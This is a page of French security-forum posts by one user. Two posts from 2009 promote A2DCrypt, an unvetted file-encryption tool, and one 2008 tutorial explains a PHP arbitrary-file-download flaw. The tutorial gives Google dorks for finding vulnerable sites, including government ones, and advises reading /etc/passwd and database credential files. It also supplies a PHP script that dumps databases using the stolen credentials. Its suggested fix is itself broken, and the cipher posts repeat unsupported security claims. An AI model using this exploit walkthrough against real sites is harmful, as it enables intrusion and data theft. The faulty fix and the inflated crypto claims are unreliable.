Voir les messages
|
Pages: [1]
|
1
|
Général / Suggestions/Dev. du site / Re : [Suggestion] Logiciel pour la rubrique "Crypto - Logiciels"
|
le: 24 Septembre 2009 à 10:52:20
|
Il est vrai, je l'admet, que la sécurité de l'algorithme A2DCrypt n'a pas été prouvé par des spécialistes, et que, par conséquent, l'auteur ne peut en aucun cas prétendre que ce logiciel peut assurer la sécurité des données face aux attaques. Cependant, ce n'est pas la première fois que la sécurité d'un algorithme ne peut être démontrée, selon la communauté cryptologiste: The problem is that we cannot measure the strength of a cipher. But that means *any* cipher, even the well-regarded ones.
( http://www.ciphersbyritter.com/NEWS3/MEMO.HTM#36376ccf.5706026@news.io.com ) je ne vois pas l'intérêt d'utiliser un algorithme de chiffrement sorti du chapeau alors que j'ai à ma disposition d'autres algo éprouvés, certifiés, avec plusieurs implémentations différentes, une portabilité assurée, etc. C'est également vrai pour l'implémentation, le code source n'est pas disponible (également sauf erreur de ma part), et n'est implantée que dans cet unique logiciel. Mais le fait que cet algorithme soit "sorti du chapeau" et qu'il ne soit pas prouvé sûr par des experts ne signifie en aucun cas qu'il ne peut être efficace: En effet, un ingénieur informaticien de Stanford University fait remarquer que les fonctions mathématiques intégrées à un simple programme comme Microsoft Excel lui permettent de concevoir en moins d'une heure un système de cryptage très efficace. ( http://www.futura-sciences.com/fr/news/t/recherche/d/limiter-le-cryptage-impossible-repondent-les-specialistes_90/) Maintenant, quelle garantie ai-je de la part du concepteur que son chiffrement est sûr ? Aucune. D'une tendance paranoïaque, je ne peux me permettre de le croire.
Je comprend parfaitement qu'un site sur la sécurité tel que NC ne peut se permettre de mettre à disposition des outils de cryptage qui puissent être faibles, de plus, et tu as parfaitement raison, A2DCrypt ne respecte pas le dernier principe de Kerckhoffs ("Le système de chiffrage doit être au préalable examiné par des experts."), mais en ce qui concerne les garanties, je ne peu m'empêcher de citer l'anecdote concernant le DES (Data Encryption Standard), "certifié" par la NSA: L'algorithme initialement conçu par IBM utilisait une clé de 112 bits. L'intervention de la NSA a ramené la taille de clé à 56 bits. Cela suscita des rumeurs selon lesquelles la NSA aurait volontairement affaibli l'algorithme, dans le but de pouvoir le casser
( http://fr.wikipedia.org/wiki/Data_Encryption_Standard ) En tout cas, si j'ai suggéré ce logiciel à NC, c'est avant tout parce que je pense qu'il est, après lecture attentive de la ref, de bonne qualité (je suis un etudiant en licence pro securité informatique, j'ai donc partiellement étudié le domaine), et est proposé par des sites de téléchargement d'une certaine ampleur, qui, tout comme NC je l'admet, ne distribuent pas de logiciels ou documents défaillants: http://www.toocharger.com/fiches/logiciels/a2dcrypt-software/39103.htmhttp://www.logitheque.com/logiciels/windows/antivirus_securite/cryptographie/telecharger/a2dcrypt_29551.htmhttp://www.geardownload.com/security/a2dcrypt-2048-bits-encryption.htmlPour finir, si tu as considéré ces messages comme du spam, je m'excuse, car ce n'était en aucun cas le but. C'est une rubrique de suggestion, j'ai donc pensé que c'était normal de proposer des lien vers des logiciels précis.
|
|
|
2
|
Général / Suggestions/Dev. du site / [Suggestion] Logiciel pour la rubrique "Crypto - Logiciels"
|
le: 23 Septembre 2009 à 16:25:35
|
Bonjour, J'ai découvert un excellent logiciel de cryptage gratuit, très rapide et puissant de type block-cipher, qui utilise des clés de 2048 bits, et je souhaiterai le partager avec la comm, voici le lien et le descriptif officiel: Logiciel: http://www.netnavis.hostoi.com/a2dcrypt/download_a2dcrypt.phpRéférence de l'algorithme: http://www.netnavis.hostoi.com/a2dcrypt/a2dcrypt-ref.zipCapture d'écran: http://www.netnavis.hostoi.com/a2dcrypt/capt.jpgCryptage de fichiers avec des clés de 2048 bits. Très rapide, A2DCrypt assure une protection de très haute qualité.
A2DCrypt est un logiciel de cryptage de fichiers prenant des clé d’une longueur de 2048 bits. Munis d’une interface simple à prendre en main, l’utilisation est facile et accessible à tous. Compatible, léger, rapide, sécurisé, et grace à un algorithme de cryptage très résistant A2DCrypt offre une protection de qualité. A2DCrypt apportera satisfaction aux particuliers et aux entreprises désirant protéger efficacement leurs données sensibles.
En effet, l’algorithme implanté est conçu pour résister aux attaques de cryptanalyse. De plus, la longueur de la clé privée (2048 bits) offre une sécurité plus que suffisante.
A2DCrypt est capable de générer des clés de 2048 bits aléatoirement, à la demande de l’utilisateur. Ces clés, stockées dans des fichiers, sont utilisées pour le chiffrement des documents. Le seul moyen de décoder le document sera de donnée la même clé qu’au chiffrement. Ainsi, la seule attaque possible serait de tester les 3,231700607131100730071487668867e+616 clés différentes.
En plus d’être basée sur la longueur de la clé, A2DCrypt utilise des parades permettant d’éviter les déchiffrements utilisant des méthodes plus ou moins standards.
Cordialement.
|
|
|
3
|
Général / Proposition de tutoriaux / [rejeté] [HACKING / SECURITE] Faille EXCLUDE
|
le: 02 Février 2008 à 19:17:52
|
WEB - PHP La faille EXCLUDE - - - - - - - - - Version: 1.0, Scoder. - - - - - - - - -
1° INTRO. 2° Explication 3° Recherche 4° Exploiatation 5° Conclusion
- 1° INTRO.
Le CyberEspace regorge de failles en tout genres et à tous les niveaux, certe. Ici, nous allons parler uniquement d'une faille Web PHP qui concerne tous les scripts d'envoie de fichiers non contrôlés, et présente sur environ 60% des systèmes permettant à un script de manipuler les headers HTTP dans l'objectif d'envoyer un fichier.
- 2° Explication
Cette faille peut être appellée la faille Exclude, car, contrairement à la vulnérabilité Include, elle permet non pas d'inclure un fichier sur une page, mais de recevoir le fichier de son choix en provenance du serveur atteint. Il suffit simplement de modifier les paramètres de l'URL (comme la faille Include), ou de modifier la valeur d'une variable HTML de type 'HIDDEN', cela dépend du script et de la façon de demander un fichier. Le script PHP procède comme ceci:
- - - [C U T H E R E] - - -
<?
echo $filename; header("Content-type: application/force-download"); header("Content-Disposition: attachment; filename=".$filename); readfile($filename);
?>
- - - [C U T H E R E] - - -
Ici, le problème est que le script ouvre le fichier puis nous envoie son contenu, ce qui fait que l'on peut télécharger les codes PHP sans qu'ils soient interprétés par le serveur. De plus, aucun contrôle n'est efféctué sur le nom du fichier passé en paramètre. Ainsi, il est possible de télécharger tout fichier, à condition qu'il soit possible au deamon web d'y accèder en lecture, et bien sur de connaître l'emplacement exact des fichiers à obtenir.
La contre-mesure serait donc:
- - - [C U T H E R E] - - -
<?
echo $filename; if($filename[0]=='/' || $filename[0]=='\') die "Error !"; $filename=str_replace($filename, "..", "./"); header("Content-type: application/force-download"); header("Content-Disposition: attachment; filename=".$filename); readfile($filename);
?>
- - - [C U T H E R E] - - -
- 4° Recherche
Le moyen le plus éfficace pour trouver des sites vulnérables est Google. En effet, ce Meta-Searcher recense tous les liens, quels qu'ils soient. Par exemple:
RECHERCHE GOOGLE: inurl:download.php? inurl:file= "errno = 2"
Thèrmes: inurl:download.php? -> Dans l'url un script de download, prenant un argument. inurl:file= -> Si possible, le nom d'un fichier légitime, toujours dans l'url. "errno=2" -> Erreur de script pour le téléchargement d'un fichier légitime, comme ça, je constate que les admins n'ont pas prévus de parade, et de plus, j'ai une idée de l'endroit où est ce script, ce qui me permet de me repérer dans l'arborescence.
Si je veux atteindre un type de site précis, je tape en plus: site:.com ou encore site:.org, etc... Tapez: inurl:download.php? inurl:file= inurl:.gov , vous aurez des (bonnes) surprises... ;-)
- 5° Exploitation
Cette faille permet donc d'obtenir tous les fichiers que le deamon peut lire (même /etc/passwd) mais la meilleur exploitation possible, je pense, est de télécharger le script PHP de connexion à la base de données (s'il y en a une), comme ça vous aurez tous les droits possibles dessus, mais en plus, je dirais que à l'heure actuelle (2007), 40% des serveurs utilisent les mêmes mots de passes pour SQL et FTP ;-). Ci dessous, un script en PHP vous permettant de télécharger la basse de donnée MySQL d'un site en fonction des codes récupérés:
- - - [C U T H E R E] - - -
<? /* * MySQL Database Viewer/Downloader - V0.1, $coder 2007. * ---------------------|------|------------------------ * Parameters |Values| * ---------------------|------|------------------------ * opt 1 stock on a local file * the result, and force * the HTTP download. * ---------------------|------|------------------------ * datab "db" The db name * ---------------------|------|------------------------ * query "query" Execute the query * ---------------------|------|------------------------ * host "host" The host name * ---------------------|------|------------------------ * user "user" The user name * ---------------------|------|------------------------ * password "pwd" The db password * ---------------------|------|------------------------ * tmp_f "fname" The tmp_fname * ----------------------------------------------------- */
$opt = $_REQUEST['opt']; $query = $_REQUEST['query']; $dbn = $_REQUEST['datab'];
$host = $_REQUEST['host']; $user = $_REQUEST['user']; $pass = $_REQUEST['passwd'];
$tmp_f = $_REQUEST['tmp_f'];
?>
<p><b><font size="4" face="Courier New">Welcome to the DataBase Viewer/Downloader</font></b></p><br>
<? /* Ici, on part du principe que $text est deja sous forme convenable (balises, etc...) */ function _Out($text) { if($opt!=1) { echo $text; echo "<br>"; } else { if($tmp_f) { $fp=fopen($tmp_f, "w"); echo "<b>-></b> Ouverture du fichier <b>".$tmp_f."</b>...<br>"; }else{ $fp=fopen("tmpf.tmp", "w"); echo "<b>-></b> Ouverture du fichier...<br>"; }; echo "<b>Ecriture en cours...</b><br>"; fputs($fp, $text); fclose($fp);
if($tmp_f) { ?> <b><a href="<? echo $tmp_f ?>">cliquez ici</a></b><br> <? } else { ?> <b><a href="tmpf.tmp">cliquez ici</a></b><br> <? }; }; }
$conn = mysql_connect($host, $user, $pass) or die(mysql_error()); if($dbn){ mysql_select_db($dbn, $conn) or die(mysql_error()); } else { $result = mysql_list_dbs($conn); $txt.="<table>\n"; while ($line = mysql_fetch_assoc($result)) { $txt.="\t<tr>\n"; foreach ($line as $col_value) { $txt.="\t\t<td>$col_value</td>\n"; } $txt.="\t</tr>\n"; } $txt.="</table>\n"; _Out($txt); };
$txt="<html>"; if($query!="" && $dbn!="") { $result = mysql_query($query) or die(mysql_error()); $txt.="<table>\n"; while ($line = mysql_fetch_assoc($result)) { $txt.="\t<tr>\n"; foreach ($line as $col_value) { $txt.="\t\t<td>$col_value</td>\n"; } $txt.="\t</tr>\n"; } $txt.="</table>\n"; } else { echo "<b>Entrez une requete valide !</b><br>"; };
_Out($txt); mysql_free_result($result); mysql_close($conn);
?>
- - - [C U T H E R E] - - -
- 6° Conclusion
La faille exclude est très fréquentes, même sur certains sites gouvernementaux, mais n'est pas très connue des administrateurs, de plus, elle est facilement exploitable pur **orthographe !** qui a un minimum de connaissance en programmation Web. C'est donc une faille dangereuse, facile à dépister avec Google, dont, je l'espère, ce tutorial vous aura été utile si vous avez ce genre de problèmes.
Scoder.
|
|
|
|